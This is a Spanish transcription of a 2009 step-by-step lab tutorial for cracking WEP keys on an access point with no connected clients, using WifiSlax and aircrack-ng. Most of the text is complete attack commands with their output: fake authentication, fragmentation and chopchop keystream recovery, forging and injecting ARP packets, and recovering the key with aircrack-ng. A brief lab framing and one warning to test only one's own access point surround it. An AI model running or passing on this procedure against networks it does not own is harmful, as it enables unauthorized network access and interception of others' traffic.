Descargar tutorial cracking WEP con WifiSlax 3.1
Transcripción
Descargar tutorial cracking WEP con WifiSlax 3.1
2009 Relis Inc. Siler Amador Donado [TUTORIAL CRACKING WEP] Laboratorio paso a paso para realizar pruebas de vulnerabilidad sobre redes inalámbricas en un ambiente controlado. [TUTORIAL CRACKING WEP] 17 de diciembre de 2009 LABORATORIO PASO A PASO PARA REALIZAR PRUEBAS DE VULNERABILIDAD SOBRE REDES INALÁMBRICAS Adaptado por: Siler Amador Donado Tomado de:http://www.aircrack-ng.org/doku.php?id=es:how_to_crack_wep_with_no_clients Equipos usados en este tutorial: Configuración 1 Dirección MAC de la interfaz eth1: 00:16:CE:07:FC:3E BSSID (dirección MAC del punto de acceso): 00:18:39:BA:4E:0D ESSID (nombre de la red Wireless): hackme1 Canal del AP: 6 Interface Wireless: eth1 Marca del AP: Linksys Configuración 2 Dirección MAC de la interfaz ra0: 00:13:D3:7B:B9:31 BSSID (dirección MAC del punto de acceso): 00:18:39:BA:4E:0D ESSID (nombre de la red Wireless): hackme1 Canal del AP: 6 Interface Wireless: ra0 Marca del AP: Linksys Configuración 3 Dirección MAC de la interfaz ra0: 00:13:D3:7B:B9:31 BSSID (dirección MAC del punto de acceso): 00:09:5B:A1:8A:42 ESSID (nombre de la red Wireless): hackme2 Canal del AP: 11 Interface Wireless: ra0 Marca del AP: Netgear Debe obtener la información equivalente de la red sobre la que desea trabajar y cambiar los valores anteriores según corresponda. La siguiente es la configuración del AP Linksys WRT300N. SILER AMADOR DONADO Página 2 [TUTORIAL CRACKING WEP] 17 de diciembre de 2009 Para garantizar el éxito en el desarrollo de este laboratorio suponemos que: Usa el liveCD con la versión 3.1 de la suite wifislax, la puede descargar de http://www.wifislax.org Usa la versión 1.0 de la suite aircrack-ng-1.0, la puede descargar de http://www.aircrackng.org/downloads.html. Luego deberá descomprimirla y compilarla de la siguiente forma: wifislax # tar -xvf aircrack-ng-1.0 wifislax # cd aircrack-ng-1.0 wifislax aircrack-ng-1.0 # make wifislax aircrack-ng-1.0 # make strip wifislax aircrack-ng-1.0 # make install Está usando drivers parcheados para inyección. Puede capturar paquetes con Wireshark para comprobar si está inyectando. Está suficientemente cerca para enviar y recibir paquetes del AP. Recuerde que recibir paquetes del AP no significa que los paquetes que transmita sean recibidos por el AP, la fuerza de la señal de las tarjetas wireless generalmente es menor que la fuerza de la señal de los AP, por lo tanto, es necesario estar cerca del AP para que los paquetes que transmita sean recibidos por el AP. Debería confirmar que puede comunicare con el AP siguiendo estas instrucciones: wifislax aircrack-ng-1.0 # aireplay-ng -9 ra0 08:15:33 Trying broadcast probe requests... 08:15:35 No Answer... 08:15:35 Found 1 APs 08:15:35 Trying directed probe requests... 08:15:35 00:18:39:BA:4E:0D - channel: 6 - 'hackme1' 08:15:41 Ping (min/avg/max): 1.944ms/145.035ms/194.523ms Power: 0.00 08:15:41 9/30: 30% 08:15:41 Injection is working! Notación: -9 Signica prueba de intrusión ra0 Interfaz inalámbrica SILER AMADOR DONADO Página 3 [TUTORIAL CRACKING WEP] 17 de diciembre de 2009 wifislax aircrack-ng-1.0 # aireplay-ng -test -e hackme1 -a 00:18:39:BA:4E:0D ra0 08:17:26 Waiting for beacon frame (BSSID: 00:18:39:BA:4E:0D) on channel 6 08:17:26 Trying broadcast probe requests... 08:17:26 Injection is working! 08:17:28 Found 1 AP 08:17:28 Trying directed probe requests... 08:17:28 00:18:39:BA:4E:0D - channel: 6 - 'hackme1' 08:17:33 Ping (min/avg/max): 1.945ms/126.139ms/192.817ms Power: 0.00 08:17:33 4/30: 13% Notación: -test Significa prueba de intrusión -e Nombre del SSID hackme1 del AP -a Dirección MAC 00:18:39:BA:4E:0D del AP No hay paquetes de datos que vienen del punto de acceso. Beacons (balizas) y otros paquetes como management frame packets son inútiles para nuestros propósitos en este tutorial. Una forma rápida para comprobar el tráfico es ejecutar airodump-ng y ver si hay algún paquete de datos. En el caso de tener paquetes de datos capturados del punto de acceso en otras sesiones, podríamos usarlos para generar nuevo tráfico. Esto es para usuarios avanzados y este tutorial no da instrucciones detalladas para este caso. El punto de acceso usa ciframiento WEP abierto (open authentication). No funcionará si la autenticación es compartida (shared key authentication) (SKA). Con SKA el único método si no existen clientes es capturar el PRGA xor data con airodump-ng handshake o hacer previamente un ataque con aireplay-ng. Esto es así porque necesita el archivo PRGA xor para hacer una falsa autenticación de forma exitosa. Usaremos la versión 1.0 de aircrack-ng. Si usa otra versión algunos comandos puede que se escriban de forma diferente. Asegúrese que cumpla todas las condiciones, de lo contrario no funcionará. En los siguientes ejemplos, tendrá que cambiar eth1 por el nombre de la interface de su tarjeta wireless. En los ejemplos, la opción guión doble bssid se muestra como - -bssid. Recuerde borrar el espacio entre los dos guiones cuando lo utilice. Esto también se aplica a - -ivs. A continuación los pasos que vamos a seguir para desarrollar el laboratorio con éxito: 1 - Fijar la dirección MAC de la tarjeta wireless 2 - Colocar la interface wireless en modo monitor y fijar el canal 3 - Usar aireplay-ng para hacer una falsa autenticación con el punto de acceso 4 - Usar chopchop o ataque de fragmentación para obtener PRGA 5 - Usar packetforge-ng para crear un paquete arp usando el PRGA obtenido en el paso anterior 6 - Iniciar airodump-ng en el canal del AP con filtro de bssid para capturar IVs 7 - Inyectar el paquete arp creado en el paso 5 8 - Ejecutar aircrack-ng para obtener la clave WEP Paso 1 - Fijar la dirección MAC de la tarjeta wireless No hemos cambiado la dirección MAC de nuestra tarjeta, en el caso que lo desee puede utilizar el comando "macchanger". Esto es un recordatorio para que use su dirección MAC real y no una falsa. En el paso 3 es importante que la dirección MAC que se use sea la de la su tarjeta para realizar la falsa autenticación. Paso 2 - Colocar la interfaz wireless en modo monitor y fijar el canal Escriba el siguiente comando para poner la tarjeta wireless en modo monitor en el canal 6: wifislax aircrack-ng-1.0 # airmon-ng start ra0 6 El sistema nos responderá: SILER AMADOR DONADO Página 4 [TUTORIAL CRACKING WEP] 17 de diciembre de 2009 Interface ra0 eth1 Chipset Driver Ralink 2560 PCI rt2500 (monitor mode enabled) Broadcom bcm43xx Puede observar que ra0 aparece colocada en modo monitor. Escriba ifconfig ra0 up para levantar la interfaz ra0 que usaremos a continuación. Para confirmar que la interfaz está bien configurada, escribimos iwconfig. El sistema nos responderá: lo ra0 no wireless extensions. RT2500 Wireless ESSID:"" Mode:Monitor Frequency=2.437 GHz Bit Rate=11 Mb/s Tx-Power:0 dBm RTS thr:off Fragment thr:off Encryption key:off Link Quality=0/100 Signal level:-120 dBm Noise level:-79 dBm Rx invalid nwid:0 Rx invalid crypt:0 Rx invalid frag:0 Tx excessive retries:0 Invalid misc:0 Missed beacon:0 eth0 no wireless extensions. eth1 IEEE 802.11b/g ESSID:off/any Nickname:"Broadcom 4318" Mode:Managed Access Point: Invalid RTS thr:off Fragment thr:off Encryption key:off Link Quality=0/100 Signal level=-256 dBm Noise level=-256 dBm Rx invalid nwid:0 Rx invalid crypt:0 Rx invalid frag:0 Tx excessive retries:0 Invalid misc:0 Missed beacon:0 Podemos ver que ra0 está en modo monitor, en la frecuencia 2.437 GHz que corresponde al canal 6 y en Access Point vemos la dirección MAC de nuestra tarjeta wireless. Es importante comprobar toda esta información antes de continuar, ya que de lo contrario no funcionará. Para ver la correspondencia entre frecuencia y canal, observe: http://www.rflinx.com/help/calculations/#2.4ghz_wifi_channels selecciona la etiqueta Wifi Channel Selection and Channel Overlap. Así obtendrá la frecuencia para cada canal. Problemas Si tiene otra interfaz en modo monitor que no sea ra0, puede usarla o escribir airomon-ng stop raX donde X es la interface que quiere parar. Paso 3 - Usar aireplay-ng para hacer una falsa autenticación con el AP Este es un paso muy importante. Para que un AP acepte un paquete, la dirección MAC debe estar previamente asociada. Si la dirección MAC con la cual estas inyectando no está asociada, el AP ignorará el paquete y enviará un paquete de desautentificación. En este caso, no se crearán nuevos IVs porque el AP está ignorando todos los paquetes inyectados. La falta de asociación con el punto de acceso es la razón más habitual por la cual falla la inyección. Para asociarse con un punto de acceso, usa el comando: wifislax aircrack-ng-1.0 # aireplay-ng -1 0 -e hackme1 -a 00:18:39:BA:4E:0D -h 00:13:D3:7B:B9:31 ra0 Notación: -1 significa falsa autenticación (fake authentication) 0 tiempo de reasociación en segundos -e hackme1 es el nombre de la red wireless -a 00:18:39:BA:4E:0D es la dirección MAC del AP -h 00:13:D3:7B:B9:31 es la dirección MAC de nuestra tarjeta wireless ra0 es el nombre de nuestra interfaz Si tenemos éxito aparecerá algo como esto: SILER AMADOR DONADO Página 5 [TUTORIAL CRACKING WEP] 17 de diciembre de 2009 18:18:20 18:18:20 18:18:20 18:18:20 Sending Authentication Request Authentication successful Sending Association Request Association successful :-) Otra variación que puede funcionar en algunos puntos de acceso: wifislax aircrack-ng-1.0 # aireplay-ng -1 6000 -o 1 -q 10 -e hackme1 -a 00:18:39:BA:4E:0D –h 00:13:D3:7B:B9:31 ra0 Notación: 6000 Reautenticación cada 6000 segundos. En este periodo de tiempo se siguen enviando paquetes de sigo aquí o keep alive packets. -o 1 Envía solo un tipo de paquetes de cada vez. El valor por defecto es múltiple y esto puede confundir a algunos APs. -q 10 Se envían paquetes de sigo aquí cada 10 segundos. Si tenemos éxito aparecerá algo como esto: 18:22:32 18:22:32 18:22:32 18:22:32 18:22:42 18:22:52 # etc.... Sending Authentication Request Authentication successful Sending Association Request Association successful :-) Sending keep-alive packet Sending keep-alive packet Ahora ponemos un ejemplo de un fallo de autenticación: 18:28:02 18:28:02 18:28:02 18:28:02 18:28:02 18:28:05 18:28:05 18:28:05 18:28:10 18:28:10 18:28:10 Sending Authentication Request Authentication successful Sending Association Request Association successful :-) Got a deauthentication packet! Sending Authentication Request Authentication successful Sending Association Request Sending Authentication Request Authentication successful Sending Association Request Preste atención a Got a deauthentication packet y los continuos intentos de asociación. No se debe continuar al siguiente paso hasta que funcione la falsa autenticación de forma correcta. Problemas Algunos AP están configurados para permitir únicamente una dirección MAC para asociarse y conectarse. Si este es su caso, no podrá realizar la falsa autenticación de forma éxitosa, salvo que conozca una de las direcciones MAC que están permitidas para poder conectarse a ese AP. Analice los problemas de filtrado MAC en este tutorial. Si desea confirmar que está asociado de forma correcta puede usar tcpdump y mirar los paquetes. Inicie una consola y escriba: wifislax aircrack-ng-1.0 # tcpdump -n -e -s0 -vvv -i ra0 Si solo desea seleccionar los paquetes de deautenticación con tcpdump usa: tcpdump -n -e -s0 -vvv -i ra0 | grep DeAuth. Puede cambiar la palabra DeAuth para escoger otros paquetes que desee buscar. SILER AMADOR DONADO Página 6 [TUTORIAL CRACKING WEP] 17 de diciembre de 2009 Paso 4 - Usar chopchop o ataque de fragmentación para obtener PRGA El objetivo de chopchop y del ataque de fragmentación es obtener un archivo PRGA (del inglés pseudo random generation algorithm o algoritmo de generación seudo aleatoria). Este PRGA no es la clave WEP y no se puede usar para descifrar paquetes. Aunque, si puede usarse para crear nuevos paquetes cifrados con la clave WEP para inyectarlos. La creación de nuevos paquetes la veremos más adelante en el tutorial. Tanto chopchop como el ataque de fragmentación pueden ser usados para obtener el archivo PRGA. El resultado es el mismo, por lo que usa el que mejor te funcione. Los pros y contras de cada ataque están descritos en la página de aircrack-ng. A continuación exponemos primero el ataque de fragmentación. Abrimos otra consola y escribimos: wifislax aircrack-ng-1.0 # aireplay-ng -5 -b 00:18:39:BA:4E:0D -h 00:13:D3:7B:B9:31 ra0 Notación: -5 significa ataque de fragmentación -b 00:18:39:BA:4E:0D es la dirección MAC del punto de acceso -h 00:13:D3:7B:B9:31 es la dirección MAC de nuestra tarjeta wireless y debe coincidir con la dirección MAC usada en la falsa autenticación ra0 es el nombre de nuestra interfaz La respuesta que obtendremos será: Waiting for a data packet... Read 127 packets... Size: 68, FromDS: 1, ToDS: 0 (WEP) BSSID = 00:18:39:BA:4E:0D Dest. MAC = 01:00:5E:00:00:01 Source MAC = 00:18:39:BA:4E:0B 0x0000: 0x0010: 0x0020: 0x0030: 0x0040: 0842 0000 0100 5e00 0001 0018 39ba 4e0d .B....^.....9.N. 0018 39ba 4e0b d0b7 579c 2d00 2e3a 422c ..9.N...W.-..:B, eb9c 7df3 c4d7 4b48 75d9 719f 12f2 c8e8 ..}...KHu.q..... b91a 9601 490c a906 74bd ccfc 18d1 8737 ....I...t......7 643a 499b d:I. Use this packet ? y Cuando recibamos un paquete del punto de acceso, escriba y para continuar. Es probable que sea necesario intentar más de una vez unos pocos paquetes para tener éxito. Si tenemos éxito aparecerá algo como esto: Saving chosen packet in replay_src-0203-180328.cap Data packet found! Sending fragmented packet Got RELAYED packet!! Thats our ARP packet! Trying to get 384 bytes of a keystream Got RELAYED packet!! Thats our ARP packet! Trying to get 1500 bytes of a keystream Got RELAYED packet!! Thats our ARP packet! Saving keystream in fragment-0203-180343.xor Now you can build a packet with packetforge-ng out of that 1500 bytes keystream SILER AMADOR DONADO Página 7 [TUTORIAL CRACKING WEP] 17 de diciembre de 2009 Éxito! El archivo fragment-0203-180343.xor lo podremos usar en el siguiente paso para generar un paquete arp. Si con el ataque de fragmentación no hemos tenido éxito, podemos probar la técnica chopchop. Para ello ejecute: wifislax aircrack-ng-1.0 # aireplay-ng -4 ra0 -h 00:13:D3:7B:B9:31 Notación: -4 significa ataque chopchop -h 00:13:D3:7B:B9:31 es la dirección MAC de nuestra tarjeta wireless y debe coincidir con la dirección MAC usada en la falsa autenticación ra0 es el nombre de nuestra interfaz La respuesta que obtendremos será: Read 165 packets... Size: 86, FromDS: 1, ToDS: 0 (WEP) BSSID = 00:18:39:BA:4E:0D Dest. MAC = FF:FF:FF:FF:FF:FF Source MAC = 00:40:F4:77:E5:C9 0x0000: 0x0010: 0x0020: 0x0030: 0x0040: 0x0050: 0842 0000 ffff ffff ffff 0014 6c7e 4080 .B..........l~@. 0040 f477 e5c9 603a d600 0000 5fed a222 [email protected]..`:...._.." e2ee aa48 8312 f59d c8c0 af5f 3dd8 a543 ...H......._=..C d1ca 0c9b 6aeb fad6 f394 2591 5bf4 2873 ....j.....%.[.(s 16d4 43fb aebb 3ea1 7101 729e 65ca 6905 ..C...>.q.r.e.i. cfeb 4a72 be46 ..Jr.F Use this packet ? y Conteste “y” y el proceso continuará. Saving chosen packet in replay_src-0201-191639.cap Offset Offset Offset Offset Offset Offset Offset Offset Offset Offset Offset Offset Offset Offset Offset Offset Offset Offset Offset Offset Offset Offset 85 ( 0% done) | xor = D3 | pt = 95 | 253 frames written in 84 ( 1% done) | xor = EB | pt = 55 | 166 frames written in 83 ( 3% done) | xor = 47 | pt = 35 | 215 frames written in 82 ( 5% done) | xor = 07 | pt = 4D | 161 frames written in 81 ( 7% done) | xor = EB | pt = 00 | 12 frames written in 80 ( 9% done) | xor = CF | pt = 00 | 152 frames written in 79 (11% done) | xor = 05 | pt = 00 | 29 frames written in 78 (13% done) | xor = 69 | pt = 00 | 151 frames written in 77 (15% done) | xor = CA | pt = 00 | 24 frames written in 76 (17% done) | xor = 65 | pt = 00 | 129 frames written in 75 (19% done) | xor = 9E | pt = 00 | 36 frames written in 74 (21% done) | xor = 72 | pt = 00 | 39 frames written in 73 (23% done) | xor = 01 | pt = 00 | 146 frames written in 72 (25% done) | xor = 71 | pt = 00 | 83 frames written in 71 (26% done) | xor = A1 | pt = 00 | 43 frames written in 70 (28% done) | xor = 3E | pt = 00 | 98 frames written in 69 (30% done) | xor = BB | pt = 00 | 129 frames written in 68 (32% done) | xor = AE | pt = 00 | 248 frames written in 67 (34% done) | xor = FB | pt = 00 | 105 frames written in 66 (36% done) | xor = 43 | pt = 00 | 101 frames written in 65 (38% done) | xor = D4 | pt = 00 | 158 frames written in 64 (40% done) | xor = 16 | pt = 00 | 197 frames written in SILER AMADOR DONADO 760ms 498ms 645ms 483ms 36ms 456ms 87ms 454ms 71ms 387ms 108ms 117ms 438ms 249ms 129ms 294ms 387ms 744ms 315ms 303ms 474ms 591ms Página 8 [TUTORIAL CRACKING WEP] 17 de diciembre de 2009 Offset 63 (42% done) | xor = 7F | pt = 0C | 72 frames written in 217ms Offset 62 (44% done) | xor = 1F | pt = 37 | 166 frames written in 497ms Offset 61 (46% done) | xor = 5C | pt = A8 | 119 frames written in 357ms Offset 60 (48% done) | xor = 9B | pt = C0 | 229 frames written in 687ms Offset 59 (50% done) | xor = 91 | pt = 00 | 113 frames written in 339ms Offset 58 (51% done) | xor = 25 | pt = 00 | 184 frames written in 552ms Offset 57 (53% done) | xor = 94 | pt = 00 | 33 frames written in 99ms Offset 56 (55% done) | xor = F3 | pt = 00 | 193 frames written in 579ms Offset 55 (57% done) | xor = D6 | pt = 00 | 17 frames written in 51ms Offset 54 (59% done) | xor = FA | pt = 00 | 81 frames written in 243ms Offset 53 (61% done) | xor = EA | pt = 01 | 95 frames written in 285ms Offset 52 (63% done) | xor = 5D | pt = 37 | 24 frames written in 72ms Offset 51 (65% done) | xor = 33 | pt = A8 | 20 frames written in 59ms Offset 50 (67% done) | xor = CC | pt = C0 | 97 frames written in 291ms Offset 49 (69% done) | xor = 03 | pt = C9 | 188 frames written in 566ms Offset 48 (71% done) | xor = 34 | pt = E5 | 48 frames written in 142ms Offset 47 (73% done) | xor = 34 | pt = 77 | 64 frames written in 192ms Offset 46 (75% done) | xor = 51 | pt = F4 | 253 frames written in 759ms Offset 45 (76% done) | xor = 98 | pt = 40 | 109 frames written in 327ms Offset 44 (78% done) | xor = 3D | pt = 00 | 242 frames written in 726ms Offset 43 (80% done) | xor = 5E | pt = 01 | 194 frames written in 583ms Offset 42 (82% done) | xor = AF | pt = 00 | 99 frames written in 296ms Offset 41 (84% done) | xor = C4 | pt = 04 | 164 frames written in 492ms Offset 40 (86% done) | xor = CE | pt = 06 | 69 frames written in 207ms Offset 39 (88% done) | xor = 9D | pt = 00 | 137 frames written in 411ms Offset 38 (90% done) | xor = FD | pt = 08 | 229 frames written in 688ms Offset 37 (92% done) | xor = 13 | pt = 01 | 232 frames written in 695ms Offset 36 (94% done) | xor = 83 | pt = 00 | 19 frames written in 58ms Offset 35 (96% done) | xor = 4E | pt = 06 | 230 frames written in 689ms Sent 957 packets, current guess: B9... The AP appears to drop packets shorter than 35 bytes. Enabling standard workaround: ARP header re-creation. Saving plaintext in replay_dec-0201-191706.cap Saving keystream in replay_dec-0201-191706.xor Completed in 21s (2.29 bytes/s) Fantástico! El archivo “replay_dec-0201-191706.xor” lo podremos usar en el siguiente paso para generar un paquete arp. Pequeñas ayudas Asegúrate de que el paquete es de 68 o más bytes porque sino no tendrás suficientes datos PRGA para generar el paquete. El PRGA capturado tiene que ser igual o mayor que la longitud del paquete que queremos generar. Para generar algunos paquetes y forzar el comienzo de chopchop, haga ping a una IP inexistente de su red. Esto forzará que el AP emita un “arp broadcast” y este aparecerá en chopchop para ser usado. Puede comprobar el paquete descifrado ejecutando “tcpdump -n -vvv -e -s0 -r replay_dec-0201191706.cap”. En nuestro laboratorio: reading from file replay_dec-0201-191706.cap, link-type IEEE802_11 (802.11) 19:17:06.842866 0us DA:Broadcast BSSID:00:14:6c:7e:40:80 SA:00:40:f4:77:e5:c9 LLC, dsap SNAP (0xaa), ssap SNAP (0xaa), cmd 0×03: oui Ethernet (0×000000), ethertype ARP (0×0806): arp who-has 192.168.1.12 tell 192.168.1.1 SILER AMADOR DONADO Página 9 [TUTORIAL CRACKING WEP] 17 de diciembre de 2009 Puede reusar el paquete capturado ejecutando “aireplay-ng -4 ra0 -h 00:09:5B:EC:EE:F2 -r replay_src0201-191639.cap”. El nombre del archivo aparece cuando se inicia chopchop. Si tiene un archivo de capturas de una sesión anterior, puede usarlo con el comando “aireplay-ng -4 ra0 -h 00:09:5B:EC:EE:F2 -r captura-sesión-anterior.cap” Problemas Si el primer paquete que ha seleccionado no funciona, pruebe unos pocos más. Algunas veces hay que intentarlo varias veces para conseguir tener éxito en cualquiera de los ataques. El ataque chopchop no funciona en algunos puntos de acceso. Si esto ocurre, pruebe el ataque de fragmentación. Y viceversa. Asegúrese de que está correctamente asociado al AP. Para comprobarlo siga las instrucciones del paso 2 con tcpdump. Paso 5 - Usar packetforge-ng para crear un paquete arp En el paso anterior hemos obtenido el PRGA. No importa con que ataque hemos generado el PRGA. Este PRGA se encuentra en los archivos con extensión “xor”. Podemos entonces usar este PRGA para generar un paquete para inyectar. Generaremos un paquete arp para la inyección. El objetivo es que el punto de acceso reenvíe continuamente el paquete arp inyectado. Cuando lo reenvíe obtendremos un nuevo IV (vector de inicialización). Todos estos IVs los usaremos para obtener la clave WEP. Pero primero vamos a generar el paquete arp para la inyección, escribiendo: wifislax aircrack-ng-1.0 # packetforge-ng -0 -a 00:14:6C:7E:40:80 -h 00:09:5B:EC:EE:F2 -k 255.255.255.255 -l 255.255.255.255.255 -y fragment-0203-180343.xor -w arp-request Notación: -0 significa generar un paquete arp -a 00:14:6C:7E:40:80 es la dirección MAC del punto de acceso -h 00:09:5B:EC:EE:F2 es la dirección MAC de nuestra tarjeta wireless -k 255.255.255.255 es la IP de destino (la mayoría de los APs responden a 255.255.255.255) -l 255.255.255.255.255 es la IP de origen (la mayoría de los APs responden a 255.255.255.255) -y fragment-0203-180343.xor es el archivo del que se leerá el PRGA -w arp-request es el nombre del archivo en el que se guardará el paquete arp La respuesta que obtendremos será: Wrote packet to: arp-request Pequeñas ayudas Después de crear el paquete, use tcpdump para revisarlo. Escriba: wifislax aircrack-ng-1.0 # tcpdump -n -vvv -e -s0 -r arp-request reading from file arp-request, link-type IEEE802_11 (802.11) 10:49:17.456350 WEP Encrypted 258us BSSID:00:14:6c:7e:40:80 SA:00:09:5b:ec:ee:f2 DA:Broadcast Data IV: 8f Pad 0 KeyID 0 Como estamos probando con nuestro propio AP (si no es así NO CONTINUES!), desciframos el paquete y nos aseguramos que es correcto. Este paso no es necesario, solo sirve para comprobar que hemos generado un paquete correcto. Escribimos: “airdecap-ng -e hackme1 -w <tu clave WEP> arp-request”. Y para ver el paquete descifrado: “tcpdump -n -r arp-request-dec”. Deberíamos observar algo como esto: reading from file arp-request-dec, link-type EN10MB (Ethernet) 10:49:17.456350 arp who-has 255.255.255.255 tell 255.255.255.255 SILER AMADOR DONADO Página 10 [TUTORIAL CRACKING WEP] 17 de diciembre de 2009 Paso 6 - Iniciar airodump-ng Abrir otra consola para capturar los IVs generados. Y escribir: wifislax aircrack-ng-1.0 # airodump-ng -c 6 –bssid 00:18:39:BA:4E:0D -w capture ra0 Notación: -c 6 es el canal de la red wireless – -bssid 00:18:39:BA:4E:0D es la dirección MAC del AP. Esto elimina el trafico de otras redes. – -ivs especifica que solo capturaremos IVs. Así el archivo será muy pequeño. Pero no uses esta opción si quieres utilizar “aircrack-ng -z”. -w capture es el nombre del archivo en el que guardaremos los IVs. ra0 es el nombre de nuestra interfaz. Paso 7 - Inyectar el paquete arp Usando la consola en la que generamos el paquete arp, escribimos: wifislax aircrack-ng-1.0 # aireplay-ng -2 -r arp-request ath0 Notación: -2 significa que usamos el modo interactivo para seleccionar el paquete -r arp-request especificamos el nombre del archivo con el paquete arp ra0 es el nombre de nuestra interfaz Obtendremos la siguiente respuesta: Size: 68, FromDS: 0, ToDS: 1 (WEP) BSSID = 00:18:39:BA:4E:0D Dest. MAC = FF:FF:FF:FF:FF:FF Source MAC = 00:09:5B:EC:EE:F2 0x0000: 0x0010: 0x0020: 0x0030: 0x0040: 0841 0201 0014 6c7e 4080 0009 5bec eef2 .A....l~@...[... ffff ffff ffff 8001 8f00 0000 7af3 8be4 ............z... c587 b696 9bf0 c30d 9cd9 c871 0f5a 38c5 ...........q.Z8. f286 fdb3 55ee 113e da14 fb19 17cc 0b5e ....U..>.......^ 6ada 92f2 j... Use this packet ? y Escribimos “y” para usar este paquete. Veremos cuantos paquetes estamos inyectando y se nos recuerda que iniciemos airodump-ng si no lo hemos hecho todavía: Saving chosen packet in replay_src-0204-104917.cap You should also start airodump-ng to capture replies. End of file. Mientras este comando se está ejecutando de forma exitosa, en la ventana de airodump-ng veremos algo similar a esto: CH 6 ][ Elapsed: 16 s ][ 2009-12-12 11:04 BSSID PWR RXQ Beacons 00:18:39:BA:4E:0D 47 100 BSSID STATION SILER AMADOR DONADO 179 #Data, #/s CH MB ENC CIPHER AUTH ESSID 2689 336 6 11 WEP WEP hackme1 PWR Lost Packets Probes Página 11 [TUTORIAL CRACKING WEP] 17 de diciembre de 2009 00:18:39:BA:4E:0D 00:09:5B:EC:EE:F2 29 0 2707 Puedes observar que solo hay un punto de acceso puesto que hemos incluido en airodump-ng el filtro para limitar la captura a un único BSSID. También observa que los paquetes de la tarjeta son aproximadamente los mismos que los paquetes (data) del BSSID. Esto significa que la inyección está funcionando bien y se pierden pocos paquetes. También observa la velocidad de inyección (#/s) de 336 paquetes por segundo, lo cual es un indicador de que la inyección está funcionando muy bien. Esta es una situación “ideal” de inyección. Problemas Si los paquetes del BSSID (data) no aumentan asegurate de que estas todavía asociado con el punto de acceso. Para hacer esto, mira las instrucciones sobre tcpdump en el paso 2. Paso 8 - Ejecutar aircrack-ng para obtener la clave WEP Inicia otra consola y escribe: wifislax aircrack-ng-1.0 # aircrack-ng -z -b 00:18:39:BA:4E:0D capture*.cap Notación: -z significa que se use el método PTW para obtener más rápido la clave WEP capture*.cap selecciona todos los archivos que comienzan por “capture” y con extensión “cap”. -b 00:14:6C:7E:40:80 selecciona el punto de acceso en el que estamos interesados Puede ejecutar aircrack-ng mientras captura paquetes. En poco tiempo, verá la clave WEP. Usando el método PTW, necesitará alrededor de 20,000 paquetes de datos para una clave de 64 bit y 40,000 para claves de 128 bit. Recuerda que el métodoPTW solo funciona con paquetes ARP. Como este tutorial solo cubre este tipo de paquetes no tendrás problema ninguno. El otro requerimiento es que has de capturar con airodump archivos *.cap, lo que significa que no puedes usar laopción ”- -ivs”. Si no usas la opción ”-z”, se aplicará el método FMS/Korek. Necesitarás aproximadamente 250,000 IVs para una clave WEP de 64 bit y 1,500,000 IVs para claves de 128 bit. Esto es aproximado y hay muchas variables que influyen en el número de IVs necesarios para obtener la clave WEP. Problemas Algunas veces es recomendable probar varias técnicas para obtener la clave WEP rápidamente. Prueba la opción “-n” para fijar la longitud de la clave (por ejemplo -n 64). Usa “-f” y prueba diferentes “fudge factors”. Usa “-k” y prueba a desabilitar los métodos korek. Solución alternativa Existe un pequeño engaño que simplifica el crackeo de la clave WEP sin clientes. Básicamente consiste en recoger cualquier paquete “broadcast” del punto de acceso y convertirlo para que el punto de acceso genere un nuevo IV. Es importante que tenga en cuenta que si usa este truco, no podrá utilizar la opción ”-z” del método PTW con aircrack-ng. Esto se debe a que el método PTW requiere paquetes arp y de esta forma no los generamos. OK, ahora se estará preguntando ¿por qué no usamos esta técnica paso a paso? La razón es que con esta técnica se reenvían todos los paquetes que reciba. Por lo que si recibe un paquete de 1000 byte entonces reenviara 1000 bytes. Esto reduce de forma muy importante el número de paquetes capturados por segundo. Aunque, como ventaja podemos destacar que es muy simple y muy fácil de hacer. Además puede que tenga suerte y que reciba un paquete muy pequeño para reenviar. En este caso, esta técnica funcionará tan bien como la descrita con anterioridad en este tutorial. Hay que tener en cuenta las mismas consideraciones y realizar con anterioridad una falsa autenticación. Escriba el siguiente comando: SILER AMADOR DONADO Página 12 [TUTORIAL CRACKING WEP] 17 de diciembre de 2009 aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b 00:18:39:BA:4E:0D -h 00:13:D3:7B:B9:31 ra0 Notación: -2 significa que usamos el modo interactivo para seleccionar el paquete -p 0841 fija el “Frame Control” para que parezca que el paquete se está enviando desde un cliente wireless. c FF:FF:FF:FF:FF:FF fija la dirección MAC de destino como “broadcast”. Esto se requiere para que el AP reenvie el paquete y así consigamos un nuevo IV. -b 00:18:39:BA:4E:0D es la dirección MAC del punto de acceso -h 00:13:D3:7B:B9:31 es la dirección MAC de nuestra tarjeta y debe coincidir con la utilizada en la falsa autenticacion ra0 es el nombre de nuestra interfaz El sistema nos contestará: Read 698 packets... Size: 86, FromDS: 1, ToDS: 0 (WEP) BSSID = 00:18:39:BA:4E:0D Dest. MAC = FF:FF:FF:FF:FF:FF Source MAC = 00:D0:CF:03:34:8C 0x0000: 0x0010: 0x0020: 0x0030: 0x0040: 0x0050: 0842 0000 ffff ffff ffff 0014 6c7e 4080 .B..........l~@. 00d0 cf03 348c a0f4 2000 0000 e233 962a ....4... ....3.* 90b5 fe67 41e0 9dd5 7271 b8ed ed23 8eda ...gA...rq...#.. ef55 d7b0 a56f bc16 355f 8986 a7ab d495 .U...o..5_...... 1daa a308 6a70 4465 9fa6 5467 d588 c10c ....jpDe..Tg.... f043 09f6 5418 .C..T. Use this packet ? y Escriba “y” para seleccionar el paquete y empezar la inyección. Recuerde, cuanto más pequeño sea el paquete mucho mejor. Al empezar la inyección verás algo como esto: Saving chosen packet in replay_src-0411-145110.cap Sent 10204 packets...(455 pps) Si aun no has iniciado airodump-ng, ejecútalo ahora. Una vez que tengas suficientes IVs, puedes iniciar aircrack-ng e intentar averiguar la clave WEP. Otra variación de este ataque es usar paquetes de una captura anterior. Debes de tener guardados los paquetes enteros, y no solo los IVs. A continuación puedes ver cómo sería el comando: aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b 00:18:39:BA:4E:0D -h 00:13:D3:7B:B9:31 -r capture01.cap ra0 Donde ”-r capture-01.cap” es el archivo de una captura anterior. Referencias 1. http://www.nextgameday.com/foro/f105/tutorial-auditoria-wireless-wifislax-saca-claves-wep-deredes-inalambricas-56761/ 2. http://archive.aircrack-ng.org/slitaz/ 3. http://www.aircrack-ng.org/doku.php?id=es:newbie_guide 4. http://www.aircrack-ng.org/doku.php?id=es:how_to_crack_wep_with_no_clients 5. http://www.aircrack-ng.org/documentation.html 6. http://www.aircrack-ng.org/downloads.html 7. http://www.aircrack-ng.org/ 8. 